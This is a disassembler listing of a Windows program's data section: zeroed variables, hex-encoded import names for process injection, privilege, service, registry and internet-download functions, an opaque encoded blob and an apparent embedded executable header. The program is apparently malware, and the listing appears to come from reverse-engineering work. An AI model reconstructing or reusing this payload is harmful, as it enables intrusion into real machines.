; sub_9AF030:loc_9B0BE8�w ...
dd 2F4h dup(0)
dword_9BCB74 dd 0 ; DATA XREF: sub_9AB1A0:loc_9AADB8�r
; sub_9B3F28:loc_9AAE40�r ...
dword_9BCB78 dd 6 dup(0) ; DATA XREF: .text:off_9BAF9B�o
dword_9BCB90 dd 0 ; DATA XREF: sub_9B227C:loc_9ACB10�w
; sub_9B227C+33�r ...
dword_9BCB94 dd 0 ; DATA XREF: sub_9B227C-5766�w
; .text:009B0620�w ...
dword_9BCB98 dd 0 ; DATA XREF: sub_9B46CC-7DB7�r
; sub_9B36E8-6A93�r ...
dword_9BCB9C dd 6 dup(0) ; DATA XREF: .text:off_9B9632�o
dword_9BCBB4 dd 0 ; DATA XREF: sub_9B022C+18�w
; sub_9B3B1C+EE5�w ...
dword_9BCBB8 dd 0 ; DATA XREF: sub_9B022C+1E�w
; sub_9B3B1C+EEF�w ...
dword_9BCBBC dd 0 ; DATA XREF: sub_9B022C+24�w
; sub_9B3B1C+EF9�w ...
dword_9BCBC0 dd 0 ; DATA XREF: sub_9B022C+2A�w
; sub_9B3B1C+F03�w
dword_9BCBC4 dd 0 ; DATA XREF: sub_9B022C+3B�w
; sub_9B3B1C+F0D�w
dword_9BCBC8 dd 0 ; DATA XREF: sub_9B022C+43�w
; sub_9B3B1C+F17�w ...
dword_9BCBCC dd 0 ; DATA XREF: sub_9AB1A0+E9D�r
; sub_9B0FD0:loc_9B1C48�r ...
dword_9BCBD0 dd 800h dup(0) ; DATA XREF: sub_9B0FD0+4D6D�o
dword_9BEBD0 dd 0 ; DATA XREF: sub_9AB1A0+E97�r
; sub_9ADCEC-EB2�r ...
dword_9BEBD4 dd 0 ; DATA XREF: sub_9ADCEC-EBB�r
; sub_9ADCEC+54�r ...
dword_9BEBD8 dd 0 ; DATA XREF: sub_9AD01C+39�w
; sub_9AF698+A�r ...
dword_9BEBDC dd 6 dup(0) ; DATA XREF: .text:off_9BADC8�o
dword_9BEBF4 dd 0 ; DATA XREF: sub_9B2010:loc_9AE704�r
; .text:009AEB1B�w ...
dword_9BEBF8 dd 0 ; DATA XREF: sub_9B2010-3938�w
; .text:009AEB16�w ...
dword_9BEBFC dd 6 dup(0) ; DATA XREF: .text:off_9BA97F�o
dword_9BEC14 dd 0 ; DATA XREF: sub_9B2118:loc_9B0570�w
; .text:009B083E�w ...
dword_9BEC18 dd 0 ; DATA XREF: sub_9B46CC-7DB1�w
; sub_9B46CC-57FE�r ...
dword_9BEC1C dd 0 ; DATA XREF: sub_9AB040:loc_9AB055�r
; sub_9B4950-98E2�r ...
dword_9BEC20 dd 0 ; DATA XREF: sub_9AEDD0:loc_9AB9E8�r
; sub_9AB040:loc_9AC5DC�r ...
dword_9BEC24 dd 0 ; DATA XREF: sub_9B4950:loc_9AEF3A�r
; sub_9B4950:loc_9B20B4�r ...
dword_9BEC28 dd 0 ; DATA XREF: sub_9B5904-93BA�w
; sub_9AB1A0:loc_9ACCB4�r ...
dword_9BEC2C dd 0 ; DATA XREF: sub_9B5904-93D0�w
; sub_9B4950-5A33�r ...
dword_9BEC30 dd 0 ; DATA XREF: sub_9AB1A0-3E0�r
; sub_9B5904-93CA�w ...
dword_9BEC34 dd 0 ; DATA XREF: sub_9B4950:loc_9AFE14�r
; sub_9B4950-1ED4�w ...
dword_9BEC38 dd 0 ; DATA XREF: sub_9B4950-4B31�r
; sub_9B4950-1EB7�w ...
dword_9BEC3C dd 0 ; DATA XREF: sub_9B4950-5A3D�w
; sub_9B4950-4B26�r ...
dword_9BEC40 dd 0 ; DATA XREF: sub_9B4950-5A1F�w
; sub_9B4950-4B1B�r ...
dd 136h dup(0)
dword_9BF11C dd 0 ; DATA XREF: sub_9B1584-2758�w
; sub_9B2118-1B3F�w ...
dword_9BF120 dd 0 ; DATA XREF: sub_9ADDA4:loc_9ACB7C�r
; sub_9ACEE8:loc_9B0F7F�w ...
dd 92h dup(0)
dword_9BF36C dd 0 ; DATA XREF: _CRT_INIT(x,x,x)+21�w
dword_9BF370 dd 34718h ; DATA XREF: _CRT_INIT(x,x,x)+54�w
; _CRT_INIT(x,x,x)+75�r
; void *Memory
Memory dd 0 ; DATA XREF: _CRT_INIT(x,x,x)+37�w
; _CRT_INIT(x,x,x)+45�r ...
dword_9BF378 dd 0 ; DATA XREF: start:loc_9AAD00�r
; start+82�r
align 10h
dword_9BF380 dd 0 ; DATA XREF: sub_9B03E8:loc_9AC3F4�r
; sub_9B03E8-3FEB�w ...
dword_9BF384 dd 0 ; DATA XREF: sub_9AD2B8+1D�w
; sub_9B03E8+3582�w ...
dword_9BF388 dd 0 ; DATA XREF: sub_9B03E8-3FDF�w
; sub_9AD2B8+23�w ...
dword_9BF38C dd 0 ; DATA XREF: sub_9AD2B8+29�w
; sub_9AD2B8+42�w
dword_9BF390 dd 0 ; DATA XREF: sub_9AD2B8+2F�w
; sub_9B03E8-3FD6�w
dword_9BF394 dd 0 ; DATA XREF: sub_9AD2B8+35�w
; sub_9B03E8-3FD0�w
word_9BF398 dw 0 ; DATA XREF: sub_9B03E8-3FC7�w
; sub_9AD2B8+3B�w
align 10h
dword_9BF3A0 dd 0F18h dup(0) ; DATA XREF: .text:off_9B94D7�o
dd 158h, 0A0h, 766F4D01h, 6C694665h, 1004165h, 656C6544h
dd 69466574h, 41656Ch, 74654701h, 706D6554h, 68746150h
dd 47010041h, 79537465h, 6D657473h, 65726944h, 726F7463h
dd 1004179h, 65656C53h, 43010070h, 65736F6Ch, 646E6148h
dd 100656Ch, 61657243h, 68546574h, 64616572h, 6F4C0100h
dd 69466B63h, 100656Ch, 46746547h, 53656C69h, 657A69h
dd 65724301h, 46657461h, 41656C69h, 65470100h, 636F4C74h
dd 69546C61h, 100656Dh, 56746547h, 69737265h, 1006E6Fh
dd 45746553h, 726F7272h, 65646F4Dh, 78450100h, 72507469h
dd 7365636Fh, 47010073h, 6F437465h, 6E616D6Dh, 6E694C64h
dd 1004165h, 4C746547h, 45747361h, 726F7272h, 72430100h
dd 65746165h, 6574754Dh, 1004178h, 43746547h, 75706D6Fh
dd 4E726574h, 41656D61h, 65470100h, 72754374h, 746E6572h
dd 636F7250h, 49737365h, 44010064h, 62617369h, 6854656Ch
dd 64616572h, 7262694Ch, 43797261h, 736C6C61h, 6F4D0100h
dd 69466576h, 7845656Ch, 50010041h, 65636F72h, 32337373h
dd 73726946h, 43010074h, 74616572h, 6F6F5465h, 6C65686Ch
dd 53323370h, 7370616Eh, 746F68h, 61655201h, 6C694664h
dd 43010065h, 74616572h, 6C694665h, 1005765h, 65766F4Dh
dd 656C6946h, 577845h, 6C654401h, 46657465h, 57656C69h
dd 69570100h, 68436564h, 6F547261h, 746C754Dh, 74794269h
dd 45010065h, 6E617078h, 766E4564h, 6E6F7269h, 746E656Dh
dd 69727453h, 5773676Eh, 6C470100h, 6C61626Fh, 6F6C6C41h
dd 4D010063h, 69746C75h, 65747942h, 69576F54h, 68436564h
dd 1007261h, 6D726554h, 74616E69h, 72685465h, 646165h
dd 74654701h, 74697845h, 65646F43h, 65726854h, 1006461h
dd 43746547h, 65727275h, 6854746Eh, 64616572h, 1006449h
dd 56746547h, 69737265h, 78456E6Fh, 57010041h, 46746961h
dd 6953726Fh, 656C676Eh, 656A624Fh, 1007463h, 4C746553h
dd 45747361h, 726F7272h, 6F4D0100h, 656C7564h, 654E3233h
dd 1007478h, 75646F4Dh, 3233656Ch, 73726946h, 45010074h
dd 54746978h, 61657268h, 53010064h, 68547465h, 64616572h
dd 6F697250h, 79746972h, 69560100h, 61757472h, 6F72506Ch
dd 74636574h, 65470100h, 72685474h, 50646165h, 726F6972h
dd 797469h, 74654701h, 72727543h, 54746E65h, 61657268h
dd 56010064h, 75747269h, 72466C61h, 1006565h, 74726956h
dd 416C6175h, 636F6C6Ch, 65470100h, 6F725074h, 64644163h
dd 73736572h, 6F4C0100h, 694C6461h, 72617262h, 1004179h
dd 4D746547h, 6C75646Fh, 6E614865h, 41656C64h, 65470100h
dd 6C6F5674h, 49656D75h, 726F666Eh, 6974616Dh, 416E6Fh
dd 74654701h, 6B636954h, 6E756F43h, 51010074h, 79726575h
dd 66726550h, 616D726Fh, 4365636Eh, 746E756Fh, 1007265h
dd 43746547h, 65727275h, 7250746Eh, 7365636Fh, 53010073h
dd 69467465h, 6954656Ch, 100656Dh, 46746547h, 41656C69h
dd 69727474h, 65747562h, 1004173h, 46746547h, 54656C69h
dd 656D69h, 69725701h, 69466574h, 100656Ch, 45746553h
dd 664F646Eh, 656C6946h, 65540100h, 6E696D72h, 50657461h
dd 65636F72h, 1007373h, 6E65704Fh, 636F7250h, 737365h
dd 72685401h, 33646165h, 78654E32h, 53010074h, 65707375h
dd 6854646Eh, 64616572h, 704F0100h, 68546E65h, 64616572h
dd 6C470100h, 6C61626Fh, 65657246h, 72430100h, 65746165h
dd 6F6D6552h, 68546574h, 64616572h, 72570100h, 50657469h
dd 65636F72h, 654D7373h, 79726F6Dh, 69560100h, 61757472h
dd 6C6C416Ch, 7845636Fh, 65520100h, 72506461h, 7365636Fh
dd 6D654D73h, 79726Fh, 74655301h, 656C6946h, 72747441h
dd 74756269h, 417365h, 65724301h, 50657461h, 65636F72h
dd 417373h, 636F4C01h, 72466C61h, 1006565h, 74726956h
dd 516C6175h, 79726575h, 65470100h, 6D655474h, 6C694670h
dd 6D614E65h, 1004165h, 65657246h, 7262694Ch, 797261h
dd 73795301h, 546D6574h, 54656D69h, 6C69466Fh, 6D695465h
dd 47010065h, 79537465h, 6D657473h, 656D6954h, 65470100h
dd 73795374h, 546D6574h, 41656D69h, 6C694673h, 6D695465h
dd 52010065h, 6E556C74h, 646E6977h, 65470100h, 646F4D74h
dd 46656C75h, 4E656C69h, 41656D61h, 72500100h, 7365636Fh
dd 4E323373h, 747865h, 72685401h, 33646165h, 72694632h
dd 7473h, 165h, 0
dd 67655201h, 61657243h, 654B6574h, 57784579h, 65520100h
dd 756C4667h, 654B6873h, 4F010079h, 536E6570h, 6E614D43h
dd 72656761h, 45010057h, 536D756Eh, 69767265h, 53736563h
dd 75746174h, 1005773h, 72657551h, 72655379h, 65636976h
dd 666E6F43h, 576769h, 65755101h, 65537972h, 63697672h
dd 6E6F4365h, 32676966h, 47010057h, 614E7465h, 5364656Dh
dd 72756365h, 49797469h, 576F666Eh, 65530100h, 746E4574h
dd 73656972h, 63416E49h, 100576Ch, 4E746553h, 64656D61h
dd 75636553h, 79746972h, 6F666E49h, 52010057h, 6E456765h
dd 654B6D75h, 57784579h, 65520100h, 74655367h, 5379654Bh
dd 72756365h, 797469h, 74654701h, 656B6F54h, 666E496Eh
dd 616D726Fh, 6E6F6974h, 71450100h, 536C6175h, 1006469h
dd 74696E49h, 696C6169h, 6553657Ah, 69727563h, 65447974h
dd 69726373h, 726F7470h, 6C410100h, 61636F6Ch, 6E416574h
dd 696E4964h, 6C616974h, 53657A69h, 1006469h, 4C746547h
dd 74676E65h, 64695368h, 6E490100h, 61697469h, 657A696Ch
dd 6C6341h, 64644101h, 65636341h, 6C417373h, 65776F6Ch
dd 65634164h, 65530100h, 63655374h, 74697275h, 73654479h
dd 70697263h, 44726F74h, 6C6361h, 74655301h, 656C6946h
dd 75636553h, 79746972h, 46010041h, 53656572h, 1006469h
dd 6E65704Fh, 636F7250h, 54737365h, 6E656B6Fh, 6F4C0100h
dd 70756B6Fh, 76697250h, 67656C69h, 6C615665h, 416575h
dd 6A644101h, 54747375h, 6E656B6Fh, 76697250h, 67656C69h
dd 1007365h, 6E65704Fh, 76726553h, 41656369h, 6F430100h
dd 6F72746Eh, 7265536Ch, 65636976h, 68430100h, 65676E61h
dd 76726553h, 43656369h, 69666E6Fh, 1004167h, 53676552h
dd 61567465h, 4565756Ch, 1005778h, 4F676552h, 4B6E6570h
dd 78457965h, 52010057h, 75516765h, 56797265h, 65756C61h
dd 577845h, 67655201h, 736F6C43h, 79654B65h, 704F0100h
dd 43536E65h, 616E614Dh, 41726567h, 704F0100h, 65536E65h
dd 63697672h, 1005765h, 736F6C43h, 72655365h, 65636976h
dd 646E6148h, 100656Ch, 72657551h, 72655379h, 65636976h
dd 74617453h, 1007375h, 72657551h, 72655379h, 65636976h
dd 666E6F43h, 416769h, 79724301h, 65527470h, 7361656Ch
dd 6E6F4365h, 74786574h, 72430100h, 47747079h, 61526E65h
dd 6D6F646Eh, 72430100h, 41747079h, 69757163h, 6F436572h
dd 7865746Eh, 4174h, 172h, 1E8h, 64615F01h, 7473756Ah
dd 6964665Fh, 5F010076h, 74696E69h, 6D726574h, 61630100h
dd 636F6C6Ch, 656D0100h, 706D636Dh, 74730100h, 74616372h
dd 62610100h, 73010073h, 1006E69h, 676F6Ch, 72747301h
dd 6B6F74h, 6F746101h, 77010069h, 70637363h, 77010079h
dd 61637363h, 5F010074h, 64736377h, 1007075h, 6C6C616Dh
dd 100636Fh, 65657266h, 656D0100h, 7970636Dh, 656D0100h
dd 7465736Dh, 63770100h, 72747373h, 735F0100h, 7270776Eh
dd 66746E69h, 63770100h, 6D636E73h, 77010070h, 636E7363h
dd 1007970h, 7363775Fh, 6D63696Eh, 77010070h, 636E7363h
dd 1007461h, 6C736377h, 1006E65h, 7363775Fh, 706D6369h
dd 735F0100h, 776C7274h, 73010072h, 74737274h, 5F010072h
dd 6E727473h, 706D6369h, 72730100h, 646E61h, 6E617201h
dd 5F010064h, 72706E73h, 66746E69h, 74730100h, 68637272h
dd 73010072h, 636E7274h, 1007970h, 6C727473h, 1006E65h
dd 7274735Fh, 706D6369h, 74730100h, 61636E72h, 7D000074h
dd 0F0000001h, 1000002h, 6E496F43h, 61697469h, 657A696Ch
dd 1007845h, 72436F43h, 65746165h, 74736E49h, 65636E61h
dd 6F430100h, 6E696E55h, 61697469h, 657A696Ch, 6F430100h
dd 74696E49h, 696C6169h, 6553657Ah, 69727563h, 7974h, 187h
dd 27Ch, 0FF0008FFh, 7FF0006h, 2FF00h, 9FFh, 194h, 294h
dd 47485301h, 70537465h, 61696365h, 6C6F466Ch, 50726564h
dd 41687461h, 1A00000h, 29C0000h, 53010000h, 6C654448h
dd 56657465h, 65756C61h, 53010041h, 74537274h, 574972h
dd 72745301h, 49727453h, 53010041h, 6C654448h, 4B657465h
dd 577965h, 1AC00h, 30400h, 624F0100h, 6E696174h, 72657355h
dd 6E656741h, 72745374h, 676E69h, 1B700h, 2B000h, 6E450100h
dd 68546D75h, 64616572h, 646E6957h, 73776Fh, 74654701h
dd 49676C44h, 6D6574h, 736F5001h, 73654D74h, 65676173h
dd 0C2000041h, 0C0000001h, 1000002h, 65746E49h, 74656E72h
dd 43746547h, 656E6E6Fh, 64657463h, 74617453h, 49010065h
dd 7265746Eh, 4F74656Eh, 416E6570h, 6E490100h, 6E726574h
dd 704F7465h, 72556E65h, 100416Ch, 70747448h, 72657551h
dd 666E4979h, 100416Fh, 65746E49h, 74656E72h, 64616552h
dd 656C6946h, 6E490100h, 6E726574h, 6C437465h, 4865736Fh
dd 6C646E61h, 0CE000065h, 0DC000001h, 0FF000002h, 0CFF0034h
dd 73FF00h, 0EFFh, 0
dd 416B8F0h, 100100F0h, 454044Ch, 414040Ch, 3 dup(40C040Ch)
dd 0C040C10h, 134F004h, 0C045404h, 0F0702804h, 0C040404h
dd 0F0047C04h, 804052Ch, 0C4040804h, 131C2204h, 1115181Dh
dd 32140F1Bh, 2806100Eh, 170B250Fh, 936094Fh, 1314192Eh
dd 30360A0Ah, 0C0A120Dh, 29092006h, 0C0C0C0Ch, 0C050C0Ch
dd 8170B05h, 0A3B1E07h, 100C1630h, 2D1B1511h, 63443106h
dd 6070722h, 60C1E23h, 506100Fh, 25081C11h, 0B071710h
dd 8142109h, 0E20110Ah, 25141915h, 21230708h, 80A1105h
dd 24060C0Ah, 39080E0Ch, 11270711h, 20080836h, 0D1D560Ah
dd 0F1A2B32h, 1A30061Dh, 2A310A1Ah, 0A101F26h, 362E180Dh
dd 150A210Ah, 37141112h, 412C141Ah, 4F2D2D2Ah, 7B1A1934h
dd 0C130C1Eh, 27300C0Ch, 1B6E0C1Fh, 2B07A10Eh, 0E0E132Ch
dd 6143809h, 0A0A0A10h, 301F5208h, 0A08069Ch, 25071514h
dd 0F201035h, 24360608h, 56060817h, 80101F0h, 35093306h
dd 21262371h, 3A13470Dh, 0E084A16h, 0A11070Fh, 0A7E127Dh
dd 4C16BD2Dh, 2A0F091Bh, 2E0E0E15h, 11153D4Fh, 1F330A13h
dd 13111543h, 1440270Ah, 330A1311h, 12101540h, 2A86160Ah
dd 4BAC0A9Bh, 110B0D1Eh, 0A0C051Bh, 1EAB0A19h, 0F0D3145h
dd 5102717h, 5100505h, 5140505h, 50A0605h, 6050C06h, 2806050Ch
dd 5090706h, 15120505h, 0D15120Dh, 5050510h, 140C08A9h
dd 6181E0Eh, 14121711h, 16260728h, 2E301C0Eh, 6070628h
dd 3C0E0933h, 12391507h, 91F190Bh, 17131229h, 172D1A1Dh
dd 3615114Ch, 1F251523h, 24180930h, 19071053h, 290E110Eh
dd 1E52234Eh, 8050611h, 516201Bh, 4E051C0Eh, 110A241Bh
dd 5950717h, 351C0706h, 2821881Ah, 8090506h, 130D264Ch
dd 0A0A3412h, 0F092964h, 0F100F1Ch, 0D670E36h, 0F07171Ah
dd 6927151Bh, 0A181F10h, 9450A18h, 0C111311h, 0E2E0F0Eh
dd 16310F26h, 220E1B4Ah, 0E1B071Ah, 0A0D0E29h, 241D3D4Ch
dd 0E0E310Eh, 2308240Eh, 224F204Bh, 8211C4Eh, 2B590B45h
dd 32230B06h, 22250720h, 710060Ah, 1F051021h, 10312C23h
dd 2526951Bh, 36221D30h, 220C160Bh, 260A2406h, 1C1F9F32h
dd 5A68307Dh, 0C100C17h, 3D43E422h, 0C0D0D15h, 0E12395Fh
dd 0F280A1Bh, 56340806h, 13110811h, 0C1E1A1Ah, 9181B08h
dd 12100E1Ah, 16342B29h, 0A730C0Dh, 3F100806h, 190C2C13h
dd 19060C11h, 451A208Eh, 4F05420Dh, 173E2519h, 2E09560Ch
dd 2B1F0646h, 0F195E06h, 223A0908h, 5140634h, 1D2F0666h
dd 300A0D05h, 207F2A19h, 0AD25113Bh, 13341210h, 0D7F03329h
dd 68F0EC03h, 0C17F003h, 239F055h, 2CCF016h, 1CF02313h
dd 60A1303h, 190F0C11h, 0C4F05B0Bh, 80C1601h, 80E0C08h
dd 6941570Ch, 0FAF0091Ah, 0F072900h, 6E80606h, 5B060606h
dd 0D0B0608h, 5050E08h, 0A0D0B05h, 22060C15h, 61D5C12h
dd 6060606h, 0F060606h, 20431D09h, 2E08255Bh, 90A0A0Eh
dd 0B0A090Ah, 19060606h, 15310B0Fh, 222D0616h, 12190D09h
dd 250B0C58h, 100D0A08h, 615430Ah, 0C12112Ah, 0C0B1E0Eh
dd 28085C45h, 8080A09h, 91C080Ch, 10230D0Eh, 0B0C0909h
dd 101B2315h, 8564808h, 0A075818h, 0F070809h, 0D0C1024h
dd 0D1F2D16h, 3138080Bh, 2C130D30h, 621222Ah, 1C44AF22h
dd 0B301C2Ch, 920330Dh, 1B064A0Fh, 65F251Dh, 0D0C3E41h
dd 1A060E76h, 2D051F1Ah, 870C0B08h, 6A62B17h, 100E0B09h
dd 1B060D06h, 6241728h, 0F0C093Ch, 0C1B2018h, 0E075213h
dd 0C1B0E0Bh, 1407250Ch, 170E0C14h, 131C3925h, 15AF014h
dd 3C1B1D44h, 70F0806h, 7090B0Ah, 17270709h, 0B370909h
dd 0B0B2B0Dh, 10060A21h, 0D0C320Ch, 443C2417h, 9230685h
dd 9E081516h, 0C081E17h, 0B080C08h, 0A080C08h, 8130B08h
dd 82E1E0Ch, 0B19050Dh, 0D0B0919h, 33091317h, 0B231031h
dd 1F7D2106h, 27090606h, 0B4B1C31h, 61F5A0Ch, 0E210B0Eh
dd 67086B0Fh, 0D390A36h, 6A11209h, 6336219h, 23063644h
dd 31120D0Ah, 171C0D0Bh, 495D0F2Fh, 6171AADh, 6061008h
dd 7060606h, 121F1805h, 91A390Ah, 61C2508h, 1F062D6Eh
dd 21492318h, 301A0D0Ch, 22151D84h, 0F1C090Ch, 909082Dh
dd 0A0B0809h, 0F0301315h, 185C00F4h, 0A0C0908h, 0D250F15h
dd 0C082606h, 0A531640h, 51160655h, 0C2D1E1Dh, 0F232D14h
dd 1C0D0B27h, 5121622h, 1E061C0Eh, 4610100Bh, 0F520623h
dd 0D0C7E1Eh, 17143B47h, 2D08072Eh, 15911125h, 160E0C44h
dd 0C080E0Eh, 0B441160Ch, 192A151Dh, 20301311h, 7160C0Bh
dd 1F150A0Ch, 8406210Ah, 11490E0Bh, 190F0B06h, 13140E4Eh
dd 2F0F4609h, 91C3923h, 915060Bh, 34690F09h, 111B4C1Ch
dd 331F0621h, 0C0D1109h, 3509150Ah, 0F0E1017h, 356C091Ah
dd 60B3F12h, 15220A1Dh, 5A0F3A05h, 19221B06h, 111B060Ch
dd 0D2B2509h, 0C0DB00Dh, 0D0B3409h, 0E0A1920h, 100E0F2Dh
dd 0B110F10h, 0B092011h, 90D070Ah, 0F74060Ch, 0A17170Dh
dd 0A270621h, 0B3D0F15h, 1F1D2907h, 7271218h, 62252E10h
dd 3C092105h, 0F0160B0Ch, 0C07014Ch, 7643160Ch, 161C3007h
dd 80B0808h, 0B080945h, 61B1509h, 0B2E0B38h, 60D140Dh
dd 1B161E22h, 0E0B0890h, 61E3C17h, 4D0163F0h, 0C28092Bh
dd 6162724h, 3329102Ah, 0F172606h, 60B060Dh, 0EB12063Fh
dd 1E0E5419h, 0B0B0B06h, 0C161031h, 0A121B0Dh, 0E0A1D33h
dd 60B0C0Eh, 1D09181Bh, 6211507h, 6150A0Bh, 8670610h, 2711372Dh
dd 0A090714h, 222F0A09h, 0D0B0836h, 6060606h, 505080Bh
dd 98362C1Dh, 2508151Bh, 41191A06h, 121D183Ah, 231B0A0Dh
dd 140C0C07h, 0B090506h, 60E0819h, 9092615h, 0B0C110Eh
dd 180C0815h, 71133D09h, 4707234Ch, 51C0909h, 0E55110Ah
dd 140C0B3Ch, 627060Eh, 0B0B0814h, 16090D48h, 2F08110Eh
dd 0C210B0Bh, 6070E1Fh, 2813152Bh, 150C0B08h, 13082107h
dd 15110B15h, 2F66050Ch, 0B0C0722h, 170C372Eh, 19120609h
dd 3C0C0B67h, 0E0B1C4Dh, 0C202F15h, 3B091113h, 25081E06h
dd 2937183Eh, 161F1414h, 0B0A3506h, 62F1624h, 480F342Ch
dd 13352731h, 1A121016h, 2D190A17h, 52150D0Ch, 22063D0Ch
dd 331D0817h, 0B250621h, 0D060C0Ch, 421F2308h, 13166508h
dd 210C1008h, 16082606h, 272D060Fh, 0C5B0B22h, 0E313740Bh
dd 13922206h, 1C060B40h, 74B091Eh, 0F170F0Ch, 0C2F1108h
dd 410C0B07h, 850D0B34h, 24562306h, 800C0916h, 160B0B1Dh
dd 0E0E080Ch, 1A060D14h, 20250688h, 160D0C08h, 44250914h
dd 60E3406h, 9062753h, 10090A88h, 8902110h, 7110D0Bh, 0B0B0622h
dd 2F0D0C86h, 14160909h, 90A0A07h, 90D080Ah, 0C0F3415h
dd 929210Bh, 9813A93Ch, 0B09060Ch, 9112D14h, 2D5B0636h
dd 8170981h, 130A0923h, 1F2E1A06h, 1B0A0624h, 0B070B0Bh
dd 1A09080Ah, 4040448h, 4040404h, 71060404h, 1C0C3810h
dd 21255608h, 8191006h, 1D442616h, 0D0B0817h, 22060D2Ch
dd 0BE069D53h, 2B1F0B07h, 0E0E0F28h, 25410620h, 6520635h
dd 150C0B41h, 171B391Ch, 180E0D1Dh, 1F081108h, 62209ABh
dd 0B0A3219h, 23100955h, 0E1C6710h, 80F2606h
dd 6190D0Fh, 0C1F0C49h, 0A22064Ah, 1C0E190Eh, 0C0B3311h
dd 23068915h, 140D0B6Ah, 0E0C0D1Ch, 21060B13h, 0D0C1454h
dd 19062325h, 28270931h, 80A2306h, 6341127h, 24250606h
dd 9091335h, 5090F09h, 12090805h, 683C0656h, 3D07082Dh
dd 0B340D0Bh, 1F17380Ch, 656850Ch, 12404B34h, 7621212h
dd 12140A0Dh, 330C0B1Fh, 10131F24h, 15150B0Bh, 201B3448h
dd 9410F29h, 3F060E06h, 1C190647h, 9553408h, 9230C22h
dd 260B0B08h, 0A21061Dh, 9154E1Ah, 952C140Fh, 0C0C104Ch
dd 0C085714h, 2D28150Bh, 2B062815h, 10101111h, 0A0A0B2Dh
dd 0A0A0A0Ah, 250C630Bh, 0D0C1B22h, 0D0B7C23h, 0B0B1B09h
dd 1E4A241Ah, 92F00631h, 2A0E2101h, 15161115h, 0E171517h
dd 6112612h, 3E091919h, 150C0B07h, 0B0C1009h, 0E4C2419h
dd 2312160Ah, 0C0C3D0Ch, 531E0E44h, 1620194Ch, 62415EAh
dd 0C0D102Eh, 0E26100Ah, 0B27310Ch, 1214290Ch, 0D110A0Fh
dd 101D1A06h, 6F100A12h, 1A0E0C33h, 0D140D0Bh, 0A181B06h
dd 472F0811h, 37090A09h, 201C3C0Eh, 536440Ch, 192C0F22h
dd 58273F0Fh, 36090608h, 64A1122h, 110B0B0Bh, 4F2F080Ch
dd 16112715h, 0A0C050Eh, 38151F45h, 57292009h, 23160D0Bh
dd 18163109h, 1B065907h, 17180929h, 19060D0Ah, 300D3606h
dd 2124226Ah, 6451449h, 18261C1Bh, 521E2A0Ah, 6060B09h
dd 6060606h, 2406130Ah, 0B171D5Bh, 62E3406h, 8EF03233h
dd 4041C1Ah, 6 dup(4040404h), 4040408h, 16h dup(4040404h)
dd 4040804h, 9 dup(4040404h), 4080404h, 9 dup(4040404h)
dd 4020CF0h, 21h dup(4040404h), 4340404h, 0F040404h, 8041504h
dd 4160E04h, 4040408h, 1A0A2428h, 11040A04h, 4040409h
dd 4041804h, 2 dup(4040404h), 4190414h, 21190D04h, 120A0404h
dd 404040Ah, 0E040A09h, 4040413h, 4020EF0h, 404320Eh, 19040B1Dh
dd 4040404h, 21041504h, 4040405h, 13170404h, 4042304h
dd 100D0418h, 404040Ch, 4040A04h, 4040704h, 19040404h
dd 190F130Ah, 4141004h, 4041304h, 1A100404h, 4040404h
dd 31040416h, 404292Fh, 409190Dh, 4040404h, 4042715h, 4040404h
dd 406121Ch, 4041204h, 4130404h, 41B0404h, 4041104h, 18180440h
dd 16040459h, 10040404h, 4170404h, 4110404h, 4040A0Ah
dd 404041Ch, 40C0404h, 4040A2Ah, 17040415h, 4040404h, 42A0408h
dd 0F040404h, 11070413h, 0A0D0404h, 28040404h, 4110404h
dd 415120Eh, 4040414h, 13040914h, 17041704h, 15041C04h
dd 1C040404h, 91C0418h, 9040B04h, 8040B04h, 4080404h, 9230408h
dd 40A4404h, 1615040Fh, 4230404h, 0D041404h, 404040Ch
dd 4040404h, 4040413h, 15040404h, 4040F08h, 404140Eh, 0E040404h
dd 9040404h, 4040D04h, 4041404h, 14151504h, 4110404h, 8040404h
dd 4040404h, 41D1204h, 101E0404h, 41E0415h, 100C1A04h
dd 4040422h, 40E0404h, 40F040Ah, 40B040Ah, 4040404h, 4040A04h
dd 40A0404h, 4041104h, 61A2704h, 4040404h, 405040Bh, 24h dup(4040404h)
dd 4040804h, 0F3F00D0Bh, 4042900h, 4080408h, 14110904h
dd 40C1104h, 8110404h, 25040404h, 12040404h, 4040404h
dd 4240409h, 4040412h, 4040C04h, 0D040413h, 0B18040Ah
dd 4B044E04h, 4040F04h, 0B040422h, 150C0404h, 4040412h
dd 8040924h, 2 dup(4040404h), 0B291004h, 4081004h, 17h dup(4040404h)
dd 404040Ch, 40C0404h, 4040804h, 4041004h, 4100414h, 4041404h
dd 4100404h, 7041104h, 40B0404h, 4041726h, 2 dup(4040404h)
dd 10150404h, 0F0040404h, 4040107h, 4110408h, 4140E04h
dd 4090834h, 4040404h, 4100404h, 4080408h, 20040F04h, 700F0404h
dd 4150422h, 15140404h, 4060404h, 2 dup(4040404h), 4040804h
dd 9040C04h, 4040404h, 404040Bh, 41C040Dh, 4080C13h, 1E040F04h
dd 18040427h, 0E041104h, 1A04040Bh, 4042C04h, 4040419h
dd 4040B04h, 12200F1Eh, 4041A04h, 8040B04h, 4080404h, 4210404h
dd 4142815h, 0E060E04h, 4040404h, 8040404h, 4040404h, 804090Fh
dd 2C040F04h, 2E04040Eh, 0E040404h, 4141704h, 41A040Eh
dd 4040404h, 4041C04h, 4040517h, 4040404h, 40D0404h, 1E04040Bh
dd 4040E04h, 4080408h, 18040404h, 4040404h, 1B042A04h
dd 14040A29h, 4281504h, 40B0404h, 1104040Dh, 4081A04h
dd 0B040804h, 4040404h, 14040904h, 40B0404h, 4140404h
dd 4100C04h, 404132Bh, 404040Bh, 4040404h, 40C3704h, 455000h
dd 3014C00h, 95ABE000h, 3Bh, 0
dd 0E00E000h, 7010B21h, 1680000h, 980000h, 0
dd 0ACDA00h, 100000h, 1800000h, 0
dd 100010h, 20000h, 400h, 2000500h, 400h, 0
dd 2300000h, 40000h, 0
dd 200h, 10000000h, 100000h, 10000000h, 100000h, 0
dd 1000h, 2 dup(0)
dd 1662C00h, 0F000h, 6 dup(0)
dd 2000000h, 1F0800h, 0Ch dup(0)
dd 100000h, 30C00h, 6 dup(0)
dd 65742E00h, 7478h, 1662000h, 100000h, 1680000h, 40000h
dd 3 dup(0)
dd 2000h, 61642E60h, 6174h, 73B800h, 1800000h, 320000h
dd 16C0000h, 3 dup(0)
dd 4000h, 65722EC0h, 636F6Ch, 234C00h, 2000000h, 240000h
dd 19E0000h, 3 dup(0)
dd 4000h, 2200042h, 16A2800h, 22AE800h, 3A2D0000h, 18180002h
dd 0C661C6B9h, 5CD7B259h, 0D7A5628h, 1513A7EFh, 0E3FE943Fh
